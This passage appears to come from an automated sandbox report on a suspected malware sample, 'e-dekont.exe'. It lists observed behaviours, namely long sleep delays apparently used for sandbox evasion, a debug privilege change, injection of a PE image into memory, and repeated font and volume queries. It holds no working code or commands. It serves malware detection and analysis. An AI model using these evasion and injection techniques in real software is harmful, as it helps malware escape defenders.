            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596313Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeWindow / User API: threadDelayed 1400Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeWindow / User API: threadDelayed 8446Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7508Thread sleep count: 1400 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7508Thread sleep count: 8446 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599543s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599202s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597446s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -594844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -594719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -594500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599543Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599202Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597446Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597094Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596766Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596547Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596313Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594500Jump to behavior
            Source: e-dekont.exe, 00000002.00000002.4086663197.00000000011AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 2_2_05B4BE28 LdrInitializeThunk,2_2_05B4BE28
            Source: C:\Users\user\Desktop\e-dekont.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\e-dekont.exeMemory written: C:\Users\user\Desktop\e-dekont.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess created: C:\Users\user\Desktop\e-dekont.exe "C:\Users\user\Desktop\e-dekont.exe"Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Users\user\Desktop\e-dekont.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
